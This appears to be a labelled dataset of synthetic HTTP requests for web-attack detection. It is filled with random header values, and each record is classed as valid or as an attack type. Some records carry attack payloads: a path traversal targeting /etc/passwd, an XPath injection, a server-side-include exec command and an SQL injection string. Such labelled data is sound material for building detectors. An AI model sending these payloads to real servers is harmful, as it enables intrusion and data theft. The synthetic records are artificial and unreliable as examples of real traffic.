~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32330
Start - Id: 36252
class: PathTransversal
POST /e_OnbLrdQ/n@nK.3NB7-fwmf/j6BMkP_nZvbNZndr75ih/2W_WfEIzt_jdK15.js? HTTP/1.0
Content-Length: 77
Content-Language: dya2nr,fp3tiak
Content-Encoding: gzip
Content-Location: http://www.aaeyY.de/enen/mntm4/ytfur/lbteh/enw6c.php4
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 19 Mar 05 24:27:20 GMT
Host: www.erfajCzwo.de
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-greek;q=0.9, windows-1252, utf-7
Accept-Encoding: 
Cache-Control: no-store
Client-ip: 151.44.78.82
Date: Wed, 02 Jan 08 08:43:28 UTC
ETag: W/"-_E8QO9dt9.fRfy"
If-Match: *
Max-Forwards: 491
MIME-Version: 4.1
Referer: http://www.vcmbo.de/mhif/4oldfoml/epaorDee/gcdagoha/t1oc.avi
User-Agent: Mozilla/9.1 (Windows; U; Win98 8.1; ge-Ed; rv:5.9.6) Gecko/27431672
Transfer-Encoding: compress
Warning: 299 www.ni9etq.css "deecyxs" "Sun, 01 Apr 07 19:16:21 UTC"

yasnlpatfri=663483&rdltn=\.\.\/\.\.\/etc\/passwd&nlo=4sua

End - Id: 36252
Start - Id: 11088
class: Valid
GET /hta/uaHnjAy4opae0OSsyn/rfTtdrardiifiEned0/8s/Rk6rraftbpfatllSoheT/ACr/dZFlWhgufAas45/sAip/ngT/enhkftppassthruyT8/uimgM5v1B/9vtc9eanthnna.css?PP7NgX8lF_Y=tRsW4CTgi&8ed=9278 HTTP/1.0
Host: 125.255.219.92
Connection: keep-alive
Accept: audio/basic
Accept-Charset: utf-7;q=0.2, cp-936;q=0.8, shift_jis
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 108.9.167.204
Cookie: dwmhia=a;eoEaka=lxhz
Cookie2: $Version="36"
Date: Sat, 10 Jan 09 16:15:32 CET
ETag: "HuunF4J5lrRhWPm-O5W"
Expect: 100-continue
From: eain7@lembagdhs.be
If-Modified-Since: Thu, 10 Dec 09 23:41:36 CET
If-Unmodified-Since: Sun, 15 Aug 04 21:04:13 GMT
If-Match: "MA.cqGqmIGyn@D59D"
If-None-Match: "-Qq.Wtg8syi_RZxXW8M"
If-Range: "PCMMMLWEI31-7CrTc"
Max-Forwards: 18
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ke4a"
Authorization: aHatc rfprt=3p4eDtd
Range: 62259-
Referer: /xbrlol/krqtinau.html
TE: trailers
Trailer: Accept-Language
User-Agent: 9tetsreaa (fCL0kJ-H; ekRzniGAtQ; 3rzGEyK; 5LVCHbh; rVOeLsBKp)
UA-CPU: PowerPC
UA-Disp: 8798,283,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 948x5637
Via: 4.7 217.108.75.57
Transfer-Encoding: compress
Upgrade: LwEo4c/2.4, leari/4.2, haaiy/0.9
Warning: 798 www.leeOy.tiff "xtasHAn" 
X-Forwarded-For: 199.237.53.206
X-Serial-Number: 57408368404912124951
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 11088
Start - Id: 5238
class: Valid
PUT /sj9toathRafnb9obg7/nso70zr/qOhiUOQ@ujsdiv-ftpW/M3m9b.htm? HTTP/1.1
Content-Length: 107
Content-Language: imoveer
Content-Encoding: compress
Content-Location: http://www.3gxP.fr/rtl6/iheds/carmlgX.dll
Content-MD5: dGhic2Y5bUNBZXJhcmlpMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Jul 09 21:31:16 GMT
Last-Modified: Mon, 01 May 06 17:16:17 GMT
Host: 120.37.59.240
Connection: close
Accept: audio/*;q=0.2, text/*;q=0.8
Accept-Charset: windows-1251;q=0.9, x-mac-hebrew, macintosh, windows-1252, x-mac-chinesetrad
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 69.94.156.212
Cookie: stohEde5pf=6417;enhe4icautrg=eIH-S57sD7k;rbhgstxqxeEezd=t :ie)E3csra>
Cookie2: $Version="1"
Date: Mon, 03 Sep 07 06:34:10 GMT
ETag: "y3NKcKvbtPlTr-fH"
Expect: ARmzle=c5eney
From: nuccwnm@7ndfhebs.fr
If-Modified-Since: Mon, 19 Jul 04 16:39:38 CET
If-Unmodified-Since: Fri, 07 Jan 05 04:51:57 GMT
If-Match: "e19lE1y.fecUVpUVBtHp"
If-None-Match: *
If-Range: Wed, 13 Jul 05 19:43:30 CET
Max-Forwards: 5974
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: hhad rueehhom=useiI
Authorization: Basic aHRpZTo3NGJweW50
Range: 627-96060,029458-
Referer: /eOalnld/ebasSa/wirhheii/uaacto/corta6p.html
TE: chunked
Trailer: Expect
User-Agent: iZkSdK http://www.bkbee.ch
UA-CPU: StrongARM
UA-Disp: 316,8199,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4414x768
Via: 6.3 85.156.19.233, dilaL/7.5 223.33.67.212
Transfer-Encoding: compress
Upgrade: dnid/6.6, cGoH/6.5, no1o/5.3, ni9ihh/8.4
Warning: 500 134.249.51.156:1631 "DademednhnwpcEstoN" 
X-Forwarded-For: 101.23.25.216
X-Serial-Number: 22844
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

uaqa=70248&4iyh=bo+Heeon46old&a6mhai=3900&Coeshceenazoa0='ameta&tlMard5toslwnpa=eQPzFb9FR&.yPT=q0cTXfv_

End - Id: 5238
Start - Id: 23084
class: Valid
GET /phnrfaTlt/dejfhnvukGxz83INj/nn4telEsaeeztrt/eIjG/Eeel/KE0wefwT/sVN0EUZjqQ-LeO.jsp?twhqo3=ehhTgEv3eehf&0see=2730651&0bccteoaaa9ynao=xahdHov+lun2&3aveoMa=eadmine7Er2wyh&PQcbPqemrservices=on9O3i1qSNuu&eray8eEr0nnse=l1execyrc0ti&eMriekNt8eWts=4it8&usv=ts8iA&wsdt3MexecMa=839&tsatueg=TszisbehPtrcp&1s.@gSRe9copyZx=avknbzcApF&epydsier1biesfi=34&dqwgjmcedIl=34&soZN6E=fhEoeEasrei4teeeee HTTP/1.0
Host: www.jsvzmft.it
Connection: cirWawli
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: lopatn-peteegi;q=0.0, rar-en, aaais-ln0glb5i;q=0.3
Cache-Control: only-if-cached
Client-ip: 4.1.174.62
Cookie: mY6vj7L39m3o=8541066;mwncattat=9921184;eIttdsi=lrrcps?
Cookie2: $Version="97"
Date: Tue, 11 Mar 08 11:40:29 UTC
ETag: W/"6jU3qjmRU9Gu.70"
Expect: 100-continue
From: 62uiI@nmaDo.it
If-Modified-Since: Tue, 29 May 07 03:53:11 GMT
If-Unmodified-Since: Wed, 13 Sep 06 22:07:16 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 09 May 08 14:03:40 UTC
Max-Forwards: 18
MIME-Version: 2.8
Pragma: ht0='D'
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=ituf8uNo
Range: 411788-,-919885,19-6
Referer: /sttlde.asmx
TE: gzip;q=0.7,gzip;q=0.3,chunked;q=0.1
Trailer: Authorization
User-Agent: Mozilla/2.2 (compatible; Konqueror/6.7; SunOS sun4u; uhnm; nornnrWol; yltonussoe)
UA-CPU: MIPS
UA-Disp: 784,1462,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8704x5020
Via: HTTP/1.1 www.eosPpnNt.html, 6.4 www.llXny.js, 4.5 www.rtHlD.png
Transfer-Encoding: identity
Upgrade: prlHv/9.3, doutme/0.7, 0ng/5.1, sapxte/1.0, gee/6.5
Warning: 268 www.tawn.tiff "T5dye6" 
X-Forwarded-For: 95.86.251.48
X-Serial-Number: 18684889581671575
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23084
Start - Id: 35817
class: XPathInjection
GET /gFvOQfV@xs/a1g538/tdcsecTpi/a_GZRpGam48c/taaeOyiraidhuepas/Zq2GLr2n3-/n1RVdvCIknUwO/musoje/stttcpo9nicoabeieFeu/tz7thodoer0c3tO5sRl/gYLv3M_-MOLUD7JtJKl.html?ing7u=niens4ne+K%40ai-Nof&gojgroee48eyfze=Te+l&tnsotdtThqa=hedicneysock_streamuiu&0qsirog=04122&uxPHVweUEC4G=99&e6=%3Fa%3Ak3a50locationror&ddTwpyaYs5=i1e8%27++or+1%3C++++hSpof%2Faocsp%2Frp%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D097%5D++++or++++%27eia%27++%3D+++%27&uAeLeYape=n&aAafRsst6=1614111793 HTTP/1.0
Host: www.dltluO.be:2
Connection: taeat
Accept: */*;q=0.1
Accept-Charset: gb2312;q=0.1, cp-932;q=0.4, cp-950;q=0.9, utf-8, x-mac-ce;q=0.8
Accept-Encoding: 
Accept-Language: r6t0e7-Xdahr;q=0.3, ee-aR, 9-bncn, oy3-t82l3iv9
Cache-Control: no-transform
Client-ip: 17.10.191.137
Cookie: o7zeida1rmsonle=ts3edH1cisfseSe5te;vEGcn=dassntoArUiFe;dsClr=wglrlt4d8awfnr5hae;2c3oIgrZora=pd$o;nc6=bZ00l
Cookie2: $Version="2"
Date: Mon, 21 Jan 08 18:51:17 CET
ETag: "F.kqxYY8TNuKf1u"
Expect: 100-continue
From: a2frd@mttrrPoVI.gov
If-Modified-Since: Tue, 14 Aug 07 16:05:19 GMT
If-Unmodified-Since: Sat, 26 Jul 08 01:02:05 UTC
If-Match: "1NgBGkP-AT3g0XQIxoDg"
If-None-Match: *
If-Range: "pe.OsHtJFIrMR1m"
Max-Forwards: 750
MIME-Version: 7.4
Pragma: mf2t=easweAts
Proxy-Authorization: luLc Okt8e=3llo
Authorization: tiECe mero=eestwii
Range: 205-0247
Referer: /a8n1/anMprEa8/OTIEerNh/a1Qo/dtOng.asmx
TE: trailers,gzip,deflate
Trailer: Via
User-Agent: Mozilla/0.0 (compatible; MSIE 9.4; Windows NT; iyes8cas; hstfi9piFt; eegeaNe)
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: Best/1.0 87.213.78.85
Transfer-Encoding: ue4i; rsnq=mehldssa
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 952 www.gere3lt.gif "ajcLu" "Fri, 03 Aug 07 19:36:17 GMT"
X-Forwarded-For: 43.11.206.228
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35817
Start - Id: 16337
class: Valid
GET /nVmusCB4PWl@e/y5la/WwgetPF--DwgetF.cgi?xEl6ots2lrystld=8&nwdAp=iocrt&mgiaPrnr=i&rcvtnarrlh9i=8834&dommoEd=676&WpufdMpFi=emynrecteioeOegoaK&nnE4haMAx0o2es6=durrbtete&9eSME4jufromA=f%40na&oaNmske2cErcb9a=srT+a HTTP/1.1
Host: 6.177.241.140
Connection: close
Accept: */*
Accept-Charset: windows-1251, iso-8859-8-i;q=0.5
Accept-Encoding: compress, identity, identity
Accept-Language: aieiai-deek;q=0.7, t8dro-ieHcocp, oHmnw-kahhis, gaiz-nitg;q=0.0, errz-za;q=0.1
Cache-Control: no-store
Client-ip: 33.226.87.182
Cookie: ninernsN=ittph;9lduaEa=loHalei)ei0
Cookie2: $Version="0"
Date: Tue, 11 May 04 14:17:11 GMT
ETag: W/"i_852kNFC8hsY6K2lVEr"
Expect: 100-continue
From: EMlse@n8Gtdetp8r.ch
If-Modified-Since: Tue, 24 Mar 09 12:38:47 GMT
If-Unmodified-Since: Sun, 30 Nov 08 02:53:12 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 21 Jun 05 19:32:03 CET
Max-Forwards: 48
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM dGJlcjJlb1l3ZW9hc25zZHJlMHQ5ZW5pZkRuTGRsaWU=
Authorization: Digest qop=auth-int
Range: -652120,9-,091-
Referer: http://www.ehhynasd.uk/ehtp9rns/etntetd/iGnrge9t.sh
TE: deflate;q=0.5
Trailer: Cache-Control
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 6.2; eD-do; rv:4.1.9) Gecko/68767028
UA-CPU: Sparc
UA-Disp: 101,468,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7557x889
Via: sfSuxm/7.1 www.nesnc.tiff, rsnwR5/1.0 216.60.213.85, 6.2 www.edIqln.shtml
Transfer-Encoding: deflate
Upgrade: ltsn/5.8, h5e/2.9, nabeo/7.5, tnn/0.6, pr74/9.1
Warning: 799 www.moaimt.jpg:7272 "O1enqniO8" "Mon, 09 May 05 14:13:25 CET"
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 6166781
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16337
Start - Id: 19374
class: Valid
GET /cf.sh?b7aBp=96414&IBFU=sltmxtynagvriPAo4g&eeda2aAl=172668&j7osRm=-she&4memcelra=871286&s4hslesaTqn=dfWNRs_ZynGI&khaki4IPNjGK=163868225&aseiaoboe9B=sn9+af&0eoaemeflm=te9img8&E11t=a-ZQ1ZZ3fsl1&iedhe50f=7&tueheL8toh9i=49180491&olsefacu5dtb=vhhhzrttpl HTTP/1.1
Host: 87.127.65.231:14848
Connection: inygie
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: min-fresh=8
Client-ip: 146.173.1.184
Cookie: iee=eln5ohtv;a6_x=804581;heE=61001
Cookie2: $Version="986"
Date: Sat, 02 Dec 06 08:32:49 GMT
ETag: "fTT0AgNqrcTk7AWm50."
Expect: tkorrudt=nthe;os9h
From: tsVcgauE@1dexxyupd.de
If-Modified-Since: Sun, 17 Jun 07 07:55:12 UTC
If-Unmodified-Since: Tue, 14 Mar 06 01:29:20 GMT
If-Match: "WkgwyqZHpV66T3jjknp1"
If-None-Match: "Tx6ZNufp46.RN6qWG"
If-Range: "_3vxR47UzY@P7hr.8toz"
Max-Forwards: 95
MIME-Version: 5.2
Pragma: rlzazb=h
Proxy-Authorization: NTLM aW9jckVuZWh1OXRia2xPZWF0bm13cXRSM29nZXBBcnJaYXl3bFRuaGFhc2RwQW9h
Authorization: Xobdeu bs6erv=sNasRUaa
Range: 294-936796
Referer: http://www.orak7bos.ch/flYYiaaj/eG4eC/xbotl.dll
TE: deflate;q=0.1,trailers,deflate
Trailer: Accept-Language
User-Agent: Mozilla/3.3 (compatible; MSIE 9.8; Unix; ra9o; dathuaO)
UA-CPU: x86
UA-Disp: 560,319,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 810x5301
Via: 8.7 150.44.197.33:24, 3.9 139.220.192.214
Transfer-Encoding: deflate
Upgrade: srset/1.6, omo/1.9, 1Mo/5.4, eEh6/3.3
Warning: 169 www.kggeEs.shtml "hfrodttelilEt" "Tue, 08 Sep 09 16:43:20 GMT"
X-Forwarded-For: 247.91.86.17
X-Serial-Number: 04731684394484360206
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 19374
Start - Id: 40179
class: SSI
GET /tQ9uc5gETpfUDa/ymhbebcfket2eiio6d/tpgzmt/cnFoxGlB/iCLU90WrO7s/xmD/nneeceeNlt/PLN-YuG0I/kmVCQnZFt7includezAU/tss0WD4eWZ..swf?xterm_DK31yU6n3h=th%24ziuodoni4lIi0%3Fh+z&nopnu8rteir=eizyt&atht=%3C%21--++++%23exec+cmd%3D%22%2Fbin%2Fls+-l+++%2Fhome%2FtrsdnXoD%2Frkm9Aga%22+++--%3E&fe=ryrYpq&a4aioaoah=eBpU&ncnryeRnmpfnbh=srscript%5C HTTP/1.0
Host: 114.97.135.76
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp, windows-1250, windows-1255;q=0.1
Accept-Encoding: *
Cache-Control: no-store
Client-ip: 0.35.2.201
Cookie: 9Mn64XQ5=eri;ott=8370544079
Date: Tue, 25 Oct 05 08:40:29 UTC
Expect: 100-continue
If-Modified-Since: Sun, 15 Mar 09 15:23:15 UTC
If-None-Match: "E_yQGn3cE93KGQyAV"
Max-Forwards: 2656
Proxy-Authorization: i3sd nmHattte=Gnylo
Authorization: rpdnte smtlieRe=eoletf
Referer: http://www.gWh4.gov/eoEe/ge7de/oaispe/fDmleyr.bin
User-Agent: Mozilla/4.9 (X11; U; Open BSD i386 1.1; ir-fh; rv:5.6.1) Gecko/05114586
Transfer-Encoding: omrsg; entds=sa1TiI
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40179
Start - Id: 9468
class: Valid
GET /CN5XchildHJLsl/tV9/n@MQanjkCgefJGLMpKG/gleatntPOini/teoao0rir2n/737gvap3incn-vH8X/lUTp5@Afwze/iV/c1PuHkmHrVf/aRRodqMehzeexbaa/iuoxoiv/QvH.jsp?eleplheCvw=vS%24T&oterzgb9gawlehj=ocC&Sctl=96e0Mfsdocumentaautoexectace&etsb=Aei%29l&60passwdw2Zh=thths5sbuiframez+aoreizo HTTP/1.0
Host: 57.75.82.113:80
Connection: close
Accept: image/*
Accept-Charset: euc-tw
Accept-Encoding: deflate;q=0.3, gzip, deflate, compress
Accept-Language: lfLl9id-hSllhp2
Cache-Control: no-store
Client-ip: 144.121.224.176
Cookie: Wxp_DserviceswEX@vp5=3724090;etlG=hs' guB4i/rylinke6t
Cookie2: $Version="20"
Date: Sat, 09 Jun 07 03:12:00 GMT
ETag: W/"XiIcXiKCk8hDam_W-6xj"
Expect: 100-continue
From: ieue@hoegnHqytl.be
If-Modified-Since: Mon, 02 Jun 08 23:07:42 CET
If-Unmodified-Since: Fri, 18 Sep 09 17:32:08 GMT
If-Match: "nf9f8nE9DX@qOg6u"
If-None-Match: "@XwX4AbOKkbcetMD"
If-Range: Thu, 16 Feb 06 09:17:09 GMT
Max-Forwards: 9273
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: exe0nc 66it=ismox
Authorization: NTLM dGxuZWFjZGF5aW51OGVsZXV3c3hjcng3Y25VN3VOR2Flb2VvZnJu
Range: -6,7-441
Referer: /srwln.sh
TE: chunked
Trailer: Date
User-Agent: Mozilla/7.2 (Windows; U; WinNT 8.3; uo-dn; rv:7.3.3) Gecko/08837068
UA-CPU: MIPS
UA-Disp: 073,150,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 383x664
Via: 7.7 www.notcDe.jpeg:96, FTP/3.2 163.60.58.62, tyRT2/1.9 104.108.197.122
Transfer-Encoding: gzip
Upgrade: ut102i/8.2, To5/4.6, ateLf/6.2, raEft2/9.6, tutT/1.1
Warning: 579 28.101.180.151:87 "tiicEdd" "Tue, 17 May 05 01:19:10 GMT"
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 010314665963317809
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 9468
Start - Id: 41366
class: SqlInjection
PUT /raqNuoasIoG8rwNnw/3f_deleteIMwindow.opensqrmmP/s5.jpg? HTTP/1.1
Content-Length: 279
Content-Language: abeel
Content-Encoding: identity
Content-Location: /njarmE3t.swf
Content-MD5: ZWdkZWxTU280RHdybmFtOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Aug 07 11:55:04 UTC
Last-Modified: Fri, 12 Oct 07 19:50:02 UTC
Host: www.sumN3.ch
Connection: keep-alive
Accept: audio/basic;q=0.2, application/*;q=0.9
Accept-Charset: x-mac-arabic;q=0.0, euc-tw, windows-1250
Accept-Encoding: deflate;q=0.6, compress;q=0.0
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 200.4.215.226
Cookie: taoEtyeEs5=1417;o2doezeAxhEe=systemn;ttzautzoaaa=985949;lSwaosasp1alnso=odeuIlnrtwZ;rivRygx6=6BEX
Cookie2: $Version="0"
Date: Tue, 15 Aug 06 10:53:32 CET
ETag: W/"J_IZ-Sru.NlxdAHqGD"
Expect: 100-continue
From: wvycy@8isLoesg.de
If-Modified-Since: Sun, 05 Sep 04 23:00:03 CET
If-Unmodified-Since: Thu, 26 Feb 09 02:11:47 UTC
If-Match: "SWFru0JFVzrFD92"
If-None-Match: *
If-Range: "RNv@t1doaOCA6mlkV4U"
Max-Forwards: 7672
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: Digest algorithm=o3su
Range: 4608-978400,71-,119649-
Referer: /serrakk7/pMhsh/tdat8.mp3
TE: deflate,trailers,chunked
Trailer: Connection
User-Agent: Mozilla/8.8 (Windows; U; Win98 2.8; ol-Sa; rv:6.1.6) Gecko/00750714
UA-Disp: 557,1073,8
UA-OS: Windows 98
UA-Color: color32
Via: 9.7 129.117.251.55:96324, stwN/6.7 119.26.188.85
Transfer-Encoding: identity
Upgrade: nhetgd/3.9
Warning: 522 63.253.58.196 "esHrot6irna" 
X-Serial-Number: 309660
----: ------------------------------------

rma9uoUoiw=49556200&WJUek21itP=7828&egiurhl=823&tIRY=8?stding&rieiIrrreuwpe=899807999&oeq='select customer_phone  '||'from customers  '||'where    customer_surname='''||  lv_surname||'''  and   customer_type=1';&th3lBprhuhoET=acrie

End - Id: 41366
Start - Id: 34427
class: Valid
POST /amnrgllFkiotnyhcwors/t-z5j8k6J@UXcKa8/gue9etZrrkyEorEaorlh/lrlddctretqorktlcN/7a8/rainfeirsleafwn5pesh/sB/pvuVJavAza.swf? HTTP/1.1
Content-Length: 258
Content-Language: emdnf,n
Content-Encoding: deflate
Content-Location: http://www.etsEho.org/c98le/Sdu6vtt/yynto/mc3m.txt
Content-MD5: ZHp1c2V0eG5lc3ZHYWQ4Ng==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 29 Feb 08 04:46:24 UTC
Last-Modified: Wed, 26 Oct 05 10:29:15 CET
Host: www.gqtcis8t.it:4
Connection: keep-alive
Accept: image/jpeg, text/*;q=0.6, video/*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eqaci-icc, otsertmn-l8siasaA;q=0.2
Cache-Control: Aebfcec=slj
Client-ip: 229.83.165.165
Cookie: chX9-=16428358;5U1Sc= 8;sgekrinmbbDft=yudtnrneo8r;dperlytGhd=di@olfromneegRn
Cookie2: $Version="5"
Date: Fri, 05 Nov 04 12:31:53 GMT
ETag: W/"dWH855hMl0vi76H2eXVj"
Expect: sehssdDq=asehro
From: uvzad@jaoeradkfe.uk
If-Modified-Since: Mon, 24 Nov 08 05:15:08 GMT
If-Unmodified-Since: Mon, 30 May 05 17:59:57 GMT
If-Match: "DvhCNCwOgahdJimkGf"
If-None-Match: "HCfJ-mzZLTO0GIfIcr"
If-Range: Tue, 13 Jun 06 20:24:03 UTC
Max-Forwards: 72
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: if1e8w idii=psa0
Authorization: tondie Eazlxi=ueeytl2
Range: -2,-34,732-
Referer: http://cyvodba.it/dJenx/a24lu8s.doc
TE: trailers,gzip
Trailer: Pragma
User-Agent: Mozilla/5.6 (Machintosh; U; PPC Mac OS X 1.1; Nb-eu; rv:5.3.1) Gecko/57214504
UA-CPU: StrongARM
UA-Disp: 7247,384,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 840x4922
Via: FTP/3.3 www.tngTece.shtml
Transfer-Encoding: identity
Upgrade: nnygpo/3.3, eaI/0.2, rgsu/5.5, tsO/7.9, rdq/5.4
Warning: 076 www.tlWems.gif "aretamgt" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 22221039836
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ho=o&oAtgtatengw=r9veGHdN&a3oitgnSn6d=15&caesttdxnw=awa6&s4=yitVnd6pc&nnp8aan=711&oiHN30HidPgg=cced9masnra7sbtfik&nqiy=0& rsaomeio&6ot=pdtktioi&vesms2aw=f0gG&nnOstlndatrt=eipert +egySks&rhjaos=n/&essibrkdegeen=68622649&tRsiddueonck=etioz2RTOc8n&et6s=EO

End - Id: 34427
Start - Id: 5711
class: Valid
PUT /2kUqZ59KFZb_.htm? HTTP/1.0
Content-Length: 175
Content-Language: lAe
Content-Encoding: identity
Content-Location: http://anjN74.ch/tnec/eaDpol/3dl2ar.dll
Content-MD5: dmRldGFlcWlud3BvcmxBdw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Jul 09 13:27:00 UTC
Last-Modified: Tue, 06 Jul 04 09:13:45 GMT
Host: 167.49.86.134:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-1;q=0.8
Accept-Encoding: deflate, gzip;q=0.1, deflate, gzip, identity
Accept-Language: matatiq-Eert
Cache-Control: only-if-cached
Client-ip: 124.131.255.178
Cookie: teNthagyl61y=14892;iiesmod=oeeietse;nabas=dItesb8aegh
Cookie2: $Version="32"
Date: Fri, 28 Apr 06 01:31:07 GMT
ETag: "VVGNW8zSXxQI4.C1N"
Expect: 100-continue
From: ototLn2u@5heey.uk
If-Modified-Since: Fri, 24 Apr 09 04:11:51 CET
If-Unmodified-Since: Sat, 19 May 07 08:01:41 CET
If-Match: *
If-None-Match: "Qoq1w6_UNGcl20zu"
If-Range: "DBeyELXU@qYyGXfEV6"
Max-Forwards: 9749
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic b3RnZTM6cG5OMXRycnk=
Authorization: Digest qop=mPie
Range: 40090-
Referer: /h0ondelI/9cTremct/rRss/aetq4aeu/hfda.sh
TE: chunked
Trailer: Cache-Control
User-Agent: etseo (a_84Mnz; oyOJvkbLb; uAQ56ByC)
UA-CPU: Sparc
UA-Disp: 1912,4963,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3416x9061
Via: HTTP/8.9 115.39.122.70, 0.2 232.216.89.160
Transfer-Encoding: identity
Upgrade: nxew/9.7, neam/4.9, tRYe/6.4, 8mide/6.4, aola/1.1
Warning: 479 www.cld3el.css:64 "ogBceDtbEhhj6uwZ" 
X-Forwarded-For: 15.65.145.193
X-Serial-Number: 7835393170
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

m.srd4=et5S&qtXfie0l=ulptr&NUZ1sfIIziframeps5=q9zmpd2ugbLu&7gvpeyee6sew=498&sttrrlagg=ea8dhomenem19e&nandieIHr&aaarnslt=ed_DbtdTZR&obenset=&&tiwhereiP|1tjeJ&Rx=5yFsoh3

End - Id: 5711
Start - Id: 130
class: Valid
GET /FA0c/nUTb0X.asp?ka=dM&AS.56bPfYm=sN4b&owsoee=rdcs+eka&tspositionS8qpasswdHPO=tuX&unmnpetbhf=gqJH&iulse7=94&nd8Kseemntaehew=235950666&XXIOP=slog&so6sweitei=0080141&eexecB90EEV5J=satmpyi&n2sunteunpe4tAr=oole&DsNrs3itoea=0khs HTTP/1.0
Host: www.azsamw5y.biz
Connection: close
Accept: audio/*;q=0.6, application/zip;q=0.2, application/x-tar
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.6
Accept-Language: t4lemi7r-edacdi2;q=0.1, Liedj9It-cooerah;q=0.4, mh2mntur-nfyi, viatcnt-hio
Cache-Control: no-cache
Client-ip: 25.87.102.68
Cookie: 3lO1e56p=8;lnasiaqCq5atail=2422744;7tioGiepdaul=pter;eEu=\u6bodyt;8se=to>;boegnoeY6Ptr0=37
Cookie2: $Version="072"
Date: Tue, 09 Jun 09 09:35:00 CET
ETag: W/"n2u9KNQIM@9S8OOc@"
Expect: Btd4soa=heikty
From: yiboT07e@nnhseug2l.org
If-Modified-Since: Thu, 13 Aug 09 20:06:46 GMT
If-Unmodified-Since: Wed, 24 Mar 04 09:14:49 CET
If-Match: "Uvra_TQf56T.NnfPTW"
If-None-Match: *
If-Range: *
Max-Forwards: 86
MIME-Version: 6.2
Pragma: ema=e
Proxy-Authorization: NTLM cm1lbmdlZGxjenVlT3RkbGl1cm5UcG1xbWhzdG8zY2FvY2lzNG9kcGFkdHh0cjQ=
Authorization: NTLM MHN1aTI4c29lcWFudXNlZW9naDRsbXVuOHZhaTRUMm9z
Range: 878739-
Referer: /iuite6fS/nehanke.asp
TE: trailers,chunked;q=0.7
Trailer: Trailer
User-Agent: Mozilla/7.6 (Machintosh; U; PPC Mac OS X 8.2; q6-yN; rv:9.2.4) Gecko/78043132
UA-CPU: x86
UA-Disp: 548,370,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9197x616
Via: 3.3 252.52.122.213
Transfer-Encoding: ilwtcu; cIrlxi=e0t4
Upgrade: amr/8.9
Warning: 599 www.remlt3.png "iaeentsgFrut9" 
X-Forwarded-For: 89.149.7.74
X-Serial-Number: 74970351581
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 130
Start - Id: 35964
class: PathTransversal
GET /lQ_@/0TpVx4N/eet/pdmiwik.asp? HTTP/1.0
Host: 24.12.24.24:80
Connection: oaao
Accept: image/*;q=0.1, image/*
Accept-Charset: windows-874, koi8-r
Accept-Encoding: 
Accept-Language: rn-wbItls, oo-ene;q=0.1, L-pmUnht;q=0.8, hn-rhtafard;q=0.1
Cache-Control: no-store
Cookie: Hea=hjJU@WKe7;4ampeogaahdihge=h+t;1fzIdWrIZlzs=hV6.;traodtoe=5486591
Cookie2: $Version="029"
